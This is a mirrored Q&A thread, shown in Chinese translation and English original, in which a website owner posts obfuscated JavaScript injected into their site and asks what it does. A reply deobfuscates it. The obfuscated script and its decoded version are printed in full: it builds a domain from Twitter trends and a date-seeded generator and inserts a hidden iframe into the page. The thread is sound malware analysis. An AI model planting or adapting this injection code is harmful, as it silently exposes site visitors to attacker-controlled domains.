当前位置: 文江博客话题详情

这是危险的 JavaScript 吗?

发布于 2024-12-14 20:38:56 字数 3091 浏览 1 评论 0原文 

<script>
(function($$) {
    d = "(@(){ %H=@( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js@functionP#AV#n('X':'`','~.getUTC\\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    for (c = 50; c; d = (t = d.split('#@PVX`~\\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    $$(d)
})(function(jsAP) {
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

我的主人对此只字未提,而且这种情况经常发生。我认为他们可能隐藏了恶意黑客攻击。

这是做什么的?

编辑:

我们正在更换主机。

该代码确实是恶意的,被注入到我们的网站中。我们的主机试图隐瞒这一点(可能是为了让我们不担心)

这发生在同一主机上我朋友的网站上。

请不要测试此脚本。

看起来像是一些混淆的注入。

原文 
<script>
(function($) {
    d = "(@(){ %H=@( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js@functionP#AV#n('X':'`','~.getUTC\\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    for (c = 50; c; d = (t = d.split('#@PVX`~\\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    $(d)
})(function(jsAP) {
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

My host is saying nothing about this and it is happening frequently. I think they might be hiding a malicious hacking attempt.

What does this do?

EDIT:

We're changing hosts.

The code is indeed malicious and was injected into our website. Our host was trying to conceal that (probably so that we wouldn't worry)

This happened to my friend's website on the same host.

Don't test out this script, please.

Looks like some obfuscated injection.

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(1

摇划花蜜的午后 2024-12-21 20:38:56

让我们一起努力并破译这一点;这会很有趣(-完成)。

到目前为止,AFAICT 正在抓住(似乎是)当前日期之前两天的第三个趋势,或者至少是有意为之(我认为它用来查找一天趋势的日期键是不正确的,因为它添加了零秒的事情发生在时间上,这在提要中不存在),从中构建一个 URL,并发送一些基于代表最近 6 小时间隔的哈希值的数据。

这是解码后解码的文本块以及开始分析:

(function () {
    jsAr = { }; // Here only for a subsequent set of jsAr['Z'] later, which may not be necessary.

    /* Returns either first element of jsA, or a joined string. */
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join('')
    };

    jsAj = document;

    loadJquery(); // Load JQ in head new script tag.

    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /** Used only once in .getJSON call. */
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /** Takes twitter as_of and subtracts ~2 days. */
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) * '1000');
        return d
    }

    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    function jso($) {
        // Wait until we have jQuery loaded.
        if (typeof($) == 'undefined') {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there's a timeout inside).
            if (typeof ($.jsAh) != 'undefined') return;
            $.jsAh = 1;

            $.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // Run JSON request every second.
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
                            if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can't, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
                            if (!jsb) jsb = jsy[jsr + jsAd + ':00'];

                            // Get third trend entry, e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');

                            //    803 + prevSixHr * 3 + 410; -- some sort of hash?
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            jsa = jsx(4) + 10;
                            jsz(jsb);

                            // Are these two lines useful? Neither jsAr['Z'] nor jsg are referenced.
                            // jsb = ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
                            jsAr['Z'] = jsg;
                            //

                            jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
                            $('body').append(jsAf)
                        } catch (jsAy) {}
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

这是从数组构造的一些 URL:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

这段代码:

jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
jsAS.appendChild(jsm)

将 jquery 脚本标记附加到 

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>

Let's work and decipher this; it'll be fun(-nish).

AFAICT so far it's grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it's using to look up a day's trends is incorrect, because it's adding a zero-seconds thing onto the time, which isn't present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.

Here's the blob of text decoded after decoding along with the start of analysis:

(function () {
    jsAr = { }; // Here only for a subsequent set of jsAr['Z'] later, which may not be necessary.

    /* Returns either first element of jsA, or a joined string. */
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join('')
    };

    jsAj = document;

    loadJquery(); // Load JQ in head new script tag.

    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /** Used only once in .getJSON call. */
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /** Takes twitter as_of and subtracts ~2 days. */
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) * '1000');
        return d
    }

    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    function jso($) {
        // Wait until we have jQuery loaded.
        if (typeof($) == 'undefined') {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there's a timeout inside).
            if (typeof ($.jsAh) != 'undefined') return;
            $.jsAh = 1;

            $.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // Run JSON request every second.
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
                            if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can't, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
                            if (!jsb) jsb = jsy[jsr + jsAd + ':00'];

                            // Get third trend entry, e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');

                            //    803 + prevSixHr * 3 + 410; -- some sort of hash?
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            jsa = jsx(4) + 10;
                            jsz(jsb);

                            // Are these two lines useful? Neither jsAr['Z'] nor jsg are referenced.
                            // jsb = ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
                            jsAr['Z'] = jsg;
                            //

                            jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
                            $('body').append(jsAf)
                        } catch (jsAy) {}
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

Here's some URLs constructed from the array:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

This chunk of code:

jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
jsAS.appendChild(jsm)

appends the jquery script tag to <head>:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
回复 原文
~没有更多了~

关于作者

山有枢

暂无简介

文章
评论
26 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

饮湿

文章 0 评论 0

明月

文章 0 评论 0

02

文章 0 评论 0

hs1283

文章 0 评论 0

风向决定发型

文章 0 评论 0

落花浅忆

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文